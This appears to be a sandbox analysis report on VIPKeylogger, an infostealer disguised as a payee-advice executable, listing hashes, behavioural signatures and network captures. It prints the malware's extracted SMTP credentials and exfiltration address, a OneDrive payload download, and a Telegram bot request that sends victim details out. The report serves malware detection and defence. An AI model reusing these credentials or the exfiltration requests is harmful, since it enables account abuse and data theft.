Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
143s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
16/11/2024, 15:49 UTC
Static task
static1
Behavioral task
behavioral1
Sample
PayeeAdvice_HK54912_R0038704_37504.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
PayeeAdvice_HK54912_R0038704_37504.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/System.dll
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/System.dll
Resource
win10v2004-20241007-en
General
-
Target
PayeeAdvice_HK54912_R0038704_37504.exe
-
Size
814KB
-
MD5
a7071c7cf3999b13607413c36e8d5418
-
SHA1
a4d955d14cfb368d93bc7083214b01dec4c90f2b
-
SHA256
4cdbe754de2114be5f9ccf7e3f3d4f9f7f8fadc279e860bb1773aee0e2de4047
-
SHA512
4680f4794735608e5594b72ed7c84e9f1af90119d76d541d3d4f27f188a1546e01d3a556d32319da58021ad886f03d67b0deae43e45b6d706b242287f9fe61ed
-
SSDEEP
24576:/vYV0HT73uF4hi1qCCeFc2QCJgGNXk01vDxPVv7c:YOzaK6VcS5xhDxK
Malware Config
Extracted
Protocol: smtp- Host:
mail.foodex.com.pk - Port:
587 - Username:
wajahat@foodex.com.pk - Password:
wajahat1975
Extracted
vipkeylogger
Protocol: smtp- Host:
mail.foodex.com.pk - Port:
587 - Username:
wajahat@foodex.com.pk - Password:
wajahat1975 - Email To:
millions1000@proton.me
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Vipkeylogger family
-
Loads dropped DLL 1 IoCs
pid Process 2600 PayeeAdvice_HK54912_R0038704_37504.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 PayeeAdvice_HK54912_R0038704_37504.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 PayeeAdvice_HK54912_R0038704_37504.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 PayeeAdvice_HK54912_R0038704_37504.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 26 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 1948 PayeeAdvice_HK54912_R0038704_37504.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2600 PayeeAdvice_HK54912_R0038704_37504.exe 1948 PayeeAdvice_HK54912_R0038704_37504.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2600 set thread context of 1948 2600 PayeeAdvice_HK54912_R0038704_37504.exe 96 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PayeeAdvice_HK54912_R0038704_37504.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PayeeAdvice_HK54912_R0038704_37504.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1948 PayeeAdvice_HK54912_R0038704_37504.exe 1948 PayeeAdvice_HK54912_R0038704_37504.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2600 PayeeAdvice_HK54912_R0038704_37504.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1948 PayeeAdvice_HK54912_R0038704_37504.exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 2600 wrote to memory of 1948 2600 PayeeAdvice_HK54912_R0038704_37504.exe 96 PID 2600 wrote to memory of 1948 2600 PayeeAdvice_HK54912_R0038704_37504.exe 96 PID 2600 wrote to memory of 1948 2600 PayeeAdvice_HK54912_R0038704_37504.exe 96 PID 2600 wrote to memory of 1948 2600 PayeeAdvice_HK54912_R0038704_37504.exe 96 PID 2600 wrote to memory of 1948 2600 PayeeAdvice_HK54912_R0038704_37504.exe 96 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 PayeeAdvice_HK54912_R0038704_37504.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 PayeeAdvice_HK54912_R0038704_37504.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\PayeeAdvice_HK54912_R0038704_37504.exe"C:\Users\Admin\AppData\Local\Temp\PayeeAdvice_HK54912_R0038704_37504.exe"1⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2600 -
C:\Users\Admin\AppData\Local\Temp\PayeeAdvice_HK54912_R0038704_37504.exe"C:\Users\Admin\AppData\Local\Temp\PayeeAdvice_HK54912_R0038704_37504.exe"2⤵
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1948
-
Network
-
Remote address:8.8.8.8:53Request28.118.140.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request140.32.126.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request196.249.167.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request97.17.167.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestapi.onedrive.comIN AResponseapi.onedrive.comIN CNAMEcommon-afdrk.fe.1drv.comcommon-afdrk.fe.1drv.comIN CNAMEodc-commonafdrk-geo.onedrive.akadns.netodc-commonafdrk-geo.onedrive.akadns.netIN CNAMEodc-commonafdrk-brs.onedrive.akadns.netodc-commonafdrk-brs.onedrive.akadns.netIN CNAMEcommon.be.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.netcommon.be.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.netIN CNAMEl-0003.l-msedge.netl-0003.l-msedge.netIN A13.107.42.12
-
GEThttps://api.onedrive.com/v1.0/shares/s!Ak1b_TF9hoG0fK5urEn6TsYKM_Y/root/contentPayeeAdvice_HK54912_R0038704_37504.exeRemote address:13.107.42.12:443RequestGET /v1.0/shares/s!Ak1b_TF9hoG0fK5urEn6TsYKM_Y/root/content HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: api.onedrive.com
Cache-Control: no-cache
ResponseHTTP/1.1 302 Found
Via: 1.1 AM3PPF2321BB25C (wls-colorado)
Location: https://fa3hwa.dm.files.1drv.com/y4mEprthCF5mq6ohjyODH5IqEX9-zxOXMFMn1SBjkig9TMJ0iW6hgdn3JyiMZPOzrO4b7j6aZi_6ijPwhelKeUnPxDOGjlqm8sCQ6PsJqBTReZUlLMc7dAcR7XlNz2TvpwYv2DEMCQktobmlzTemLYAZHbCHN5XyR1CyXP4MLrlsiLaHWYTUMx7UdGkSNmTxrk-jRRJigmuo_I0CVq8QFAgzw/kuqVmvhlro64.bin
Vary: Accept,Accept-Language,Authorization,Prefer
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-WLSPROXY: AM3PPF2321BB25C
MS-CV: 2QZESTAWNkeyxHNvVx/eWQ.0
X-MSNSERVER: DS1PPFB5E6240F0
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-VroomVersion: v1.0
X-AsmVersion: UNKNOWN; 19.1547.1104.2005
X-AsmVersion-ProxyApp: UNKNOWN; 19.1547.1104.2005
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: 179CF393B19E4581BB8916838DD262D1 Ref B: LON04EDGE0720 Ref C: 2024-11-16T15:49:28Z
Date: Sat, 16 Nov 2024 15:49:28 GMT
Content-Length: 0
-
Remote address:8.8.8.8:53Requestfa3hwa.dm.files.1drv.comIN AResponsefa3hwa.dm.files.1drv.comIN CNAMEdm-files.fe.1drv.comdm-files.fe.1drv.comIN CNAMEodc-dm-files-geo.onedrive.akadns.netodc-dm-files-geo.onedrive.akadns.netIN CNAMEodc-dm-files-brs.onedrive.akadns.netodc-dm-files-brs.onedrive.akadns.netIN CNAMEdm-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.netdm-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.netIN CNAMEl-0003.l-msedge.netl-0003.l-msedge.netIN A13.107.42.12
-
Remote address:8.8.8.8:53Request12.42.107.13.in-addr.arpaIN PTRResponse12.42.107.13.in-addr.arpaIN PTR1drvms
-
GEThttps://fa3hwa.dm.files.1drv.com/y4mEprthCF5mq6ohjyODH5IqEX9-zxOXMFMn1SBjkig9TMJ0iW6hgdn3JyiMZPOzrO4b7j6aZi_6ijPwhelKeUnPxDOGjlqm8sCQ6PsJqBTReZUlLMc7dAcR7XlNz2TvpwYv2DEMCQktobmlzTemLYAZHbCHN5XyR1CyXP4MLrlsiLaHWYTUMx7UdGkSNmTxrk-jRRJigmuo_I0CVq8QFAgzw/kuqVmvhlro64.binPayeeAdvice_HK54912_R0038704_37504.exeRemote address:13.107.42.12:443RequestGET /y4mEprthCF5mq6ohjyODH5IqEX9-zxOXMFMn1SBjkig9TMJ0iW6hgdn3JyiMZPOzrO4b7j6aZi_6ijPwhelKeUnPxDOGjlqm8sCQ6PsJqBTReZUlLMc7dAcR7XlNz2TvpwYv2DEMCQktobmlzTemLYAZHbCHN5XyR1CyXP4MLrlsiLaHWYTUMx7UdGkSNmTxrk-jRRJigmuo_I0CVq8QFAgzw/kuqVmvhlro64.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Cache-Control: no-cache
Host: fa3hwa.dm.files.1drv.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Length: 277568
Content-Type: application/octet-stream
Content-Location: https://fa3hwa.dm.files.1drv.com/y4m_-tS-_uEp2WLW1w2OoZgzsGzku4HExGuSK8wL1Z32RLgaY3iv2hMYfC9YHYGwFGEq0tfy0dQYpSfCk-TMSdqBUJa4Ey50Bu0VPEzjgm9430LdVRPhHYoVVX-UPBUPOYw_1hYmvg7hXtrIrgh29l7yob8XHPOVRJWGksng5GhlK75aQs6mkqIiDbsmuul9oaMCqa6H0VbKFkF1t6HS8JKUw
Expires: Fri, 14 Feb 2025 15:49:29 GMT
Last-Modified: Thu, 14 Nov 2024 05:13:34 GMT
Accept-Ranges: bytes
ETag: aQjQ4MTg2N0QzMUZENUI0RCExMjQuMg
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-MSNSERVER: DS1PPF422D3B0AC
Strict-Transport-Security: max-age=31536000; includeSubDomains
MS-CV: 8uo6kfdiWUewrP2987GxUw.0
X-SqlDataOrigin: S
CTag: aYzpCNDgxODY3RDMxRkQ1QjREITEyNC4yNTc
X-PreAuthInfo: rv;poba;
Content-Disposition: attachment; filename="kuqVmvhlro64.bin"
X-Content-Type-Options: nosniff
X-StreamOrigin: X
X-AsmVersion: UNKNOWN; 19.1547.1104.2005
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: D2BFB17827DC4C0B85CA311F8F5AF0A3 Ref B: LON04EDGE1214 Ref C: 2024-11-16T15:49:29Z
Date: Sat, 16 Nov 2024 15:49:29 GMT
-
Remote address:8.8.8.8:53Requestcheckip.dyndns.orgIN AResponsecheckip.dyndns.orgIN CNAMEcheckip.dyndns.comcheckip.dyndns.comIN A132.226.247.73checkip.dyndns.comIN A193.122.6.168checkip.dyndns.comIN A193.122.130.0checkip.dyndns.comIN A158.101.44.242checkip.dyndns.comIN A132.226.8.169
-
Remote address:132.226.247.73:80RequestGET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 499c9118070dacc7703c9dfad9be5ab5
-
Remote address:132.226.247.73:80RequestGET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
ResponseHTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 972005ac083cb2b06e7cd46d4f18b08f
-
Remote address:132.226.247.73:80RequestGET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
ResponseHTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 1986e9f1485ae6892d38308dc0df1f98
-
Remote address:132.226.247.73:80RequestGET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
ResponseHTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: a0032cf886aed4659a5ce8c24f88099f
-
Remote address:132.226.247.73:80RequestGET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
ResponseHTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 2ec5ac7cdcc8caefe69b448c15299a4e
-
Remote address:132.226.247.73:80RequestGET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
ResponseHTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: b3fb38cb81f50e2f68d8c061d7665193
-
Remote address:132.226.247.73:80RequestGET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
ResponseHTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 022acd3f1157b717fd251d26ba538633
-
Remote address:132.226.247.73:80RequestGET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
ResponseHTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: d0216ac5e4f0a3ab10e2912140f74b08
-
Remote address:132.226.247.73:80RequestGET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
ResponseHTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: dce9514b360f27ca5d3981f70354208a
-
Remote address:132.226.247.73:80RequestGET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
ResponseHTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: a682975d49fca824f0c0f0e9407d20e5
-
Remote address:8.8.8.8:53Requestreallyfreegeoip.orgIN AResponsereallyfreegeoip.orgIN A172.67.177.134reallyfreegeoip.orgIN A104.21.67.152
-
Remote address:172.67.177.134:443RequestGET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 259626
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ShbAyYiy5jY84lKhIJC22yB0zrog6jTkKYFf2BgsG9AAJDDkVoN9irvaMW%2BODzi8OFLh523gH5R3c8gR009%2BMkpAQPjjAPz8NMXcq42WwF3nvtgjK4MQtBnEejBNn9gZ5qkdhuSH"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e38a1adaa6f3dca-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=49780&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3011&recv_bytes=390&delivery_rate=75593&cwnd=253&unsent_bytes=0&cid=fa7bc93dce3a2b11&ts=143&x=0"
-
Remote address:172.67.177.134:443RequestGET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org
ResponseHTTP/1.1 200 OK
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 259626
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3PN%2FvNAxe9a1pxFSJ%2BCU%2FF7%2B9QCxHZflJZ3mNeEvfjz0AjmPCBbWZ2NN0JX80dRTRHAHGkNNlT7WjZbBGOoUqy7TP50cYA4pT3XnCy%2BcWUtOt4BlgIr6NLoNVnzH%2FkKD3FZoPQFE"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e38a1af9d653dca-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=56315&sent=6&recv=8&lost=0&retrans=0&sent_bytes=4249&recv_bytes=482&delivery_rate=75593&cwnd=254&unsent_bytes=0&cid=fa7bc93dce3a2b11&ts=449&x=0"
-
Remote address:172.67.177.134:443RequestGET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org
ResponseHTTP/1.1 200 OK
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 259627
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6JYb8wWIlZTy1ETNRgllbBeudaQYSpACbDzNznvKP%2FmXm1kWLWFZZ3pcNAGkocuYOVsH5RzmOq8wzZ23yXUMtnPOriBjF3YUeVlvFtYu61Kp7nCj20BwDX%2BT1%2BLXEgBC8hfQYFhZ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e38a1b1785d3dca-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=60527&sent=7&recv=10&lost=0&retrans=0&sent_bytes=5495&recv_bytes=574&delivery_rate=75593&cwnd=255&unsent_bytes=0&cid=fa7bc93dce3a2b11&ts=753&x=0"
-
Remote address:172.67.177.134:443RequestGET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org
ResponseHTTP/1.1 200 OK
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 259627
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8DPRwQKxlnKHdcnmJXg77ip7sN7pSX%2BDgC%2Bpz5mgWS6qOfnKtq6arsXd1uaxZ7FtpkWjxXTvFPPSDoIVs3Z8sanao4owYj9Lao9F8uPrzz3PzTr3WxYk%2B8uElPNnb7%2BEXwLx5KZH"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e38a1b35c073dca-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=65270&sent=8&recv=12&lost=0&retrans=0&sent_bytes=6736&recv_bytes=666&delivery_rate=75593&cwnd=256&unsent_bytes=0&cid=fa7bc93dce3a2b11&ts=1049&x=0"
-
Remote address:172.67.177.134:443RequestGET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org
ResponseHTTP/1.1 200 OK
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 259627
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wKDIdYt8RkaGOszsrrIk%2ByoeBvhjiHrB8z49idZWYEnEDRdTJUhLItSdLY9IUtPmc85kMQUwBUdMLFXWC8b5TF3nZUB2gvy0XTzwXBcKSb%2FO4KO0E93yAmG0MO1zinL1ji6yb5up"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e38a1b53f023dca-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=69556&sent=9&recv=14&lost=0&retrans=0&sent_bytes=7980&recv_bytes=758&delivery_rate=75593&cwnd=257&unsent_bytes=0&cid=fa7bc93dce3a2b11&ts=1343&x=0"
-
Remote address:172.67.177.134:443RequestGET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org
ResponseHTTP/1.1 200 OK
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 259627
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xSRI0mCS4tLdIxd8fniWLqayh%2BCSAUGPo6lcbkBhjv%2Fc%2BR6EO77cBFNB4h1Hdgd5ylPZWE4%2FJ1RW6cf%2BZ31JXMU18HsvcOzkiDiEwXsVF2sz98COsLhfEnXQD6EhWMkplOd%2Fb4Bn"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e38a1b709cc3dca-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=71765&sent=10&recv=16&lost=0&retrans=0&sent_bytes=9220&recv_bytes=850&delivery_rate=75593&cwnd=257&unsent_bytes=0&cid=fa7bc93dce3a2b11&ts=1635&x=0"
-
Remote address:172.67.177.134:443RequestGET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org
ResponseHTTP/1.1 200 OK
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 259628
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DRh6oABA4R3oh9nzmi51Rel0XEdbSEwhRJn0fIOihjTbUXy%2BgZ16ExupK%2FvKyRZUzMkqRaNRKi%2BSgkN3ssBUD8vVIi1j3QDIFnr9V7SjsHoIKryggQSEJ6EE%2BEnd%2FMRMOhdV1JBv"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e38a1b8dd783dca-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=74285&sent=11&recv=18&lost=0&retrans=0&sent_bytes=10469&recv_bytes=942&delivery_rate=75593&cwnd=257&unsent_bytes=0&cid=fa7bc93dce3a2b11&ts=1937&x=0"
-
Remote address:172.67.177.134:443RequestGET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org
ResponseHTTP/1.1 200 OK
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 259628
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DNksq%2BEQlyGF4kbQF4k94xvN%2FiacoRB8%2BWE5VELmPbYMb2HRWvVhbBGZYE2y28mbghSPbNFi6fh40l3FQWhO3a3BM%2FOrPcaKLMD5s4REigrhfXHNTEOORUVB%2FWAxf%2FKeMKP66B69"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e38a1bab8683dca-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=77787&sent=12&recv=20&lost=0&retrans=0&sent_bytes=11717&recv_bytes=1034&delivery_rate=75593&cwnd=257&unsent_bytes=0&cid=fa7bc93dce3a2b11&ts=2245&x=0"
-
Remote address:172.67.177.134:443RequestGET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org
ResponseHTTP/1.1 200 OK
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 259628
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0hEZxsrRoqaJwEjavlY1C0HnnnqgMKZuGY%2BUJI7JzQgmsQSxmcLemmrPjBdzRCwHLH1vChfLXaC0qAAaxhHVKIS9MycNZXlBivRk3%2FeYZtut%2FUe1Y%2FEHImNW%2FZsahUqqaUUP5jpp"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e38a1bcabd93dca-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=79428&sent=13&recv=22&lost=0&retrans=0&sent_bytes=12968&recv_bytes=1126&delivery_rate=75593&cwnd=257&unsent_bytes=0&cid=fa7bc93dce3a2b11&ts=2565&x=0"
-
Remote address:8.8.8.8:53Request73.247.226.132.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request134.177.67.172.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestapi.telegram.orgIN AResponseapi.telegram.orgIN A149.154.167.220
-
GEThttps://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:KBKWGEBK%0D%0ADate%20and%20Time:%2011/16/2024%20/%203:49:33%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20KBKWGEBK%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5DPayeeAdvice_HK54912_R0038704_37504.exeRemote address:149.154.167.220:443RequestGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:KBKWGEBK%0D%0ADate%20and%20Time:%2011/16/2024%20/%203:49:33%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20KBKWGEBK%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
Date: Sat, 16 Nov 2024 15:49:35 GMT
Content-Type: application/json
Content-Length: 55
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
-
Remote address:8.8.8.8:53Request220.167.154.149.in-addr.arpaIN PTRResponse
-
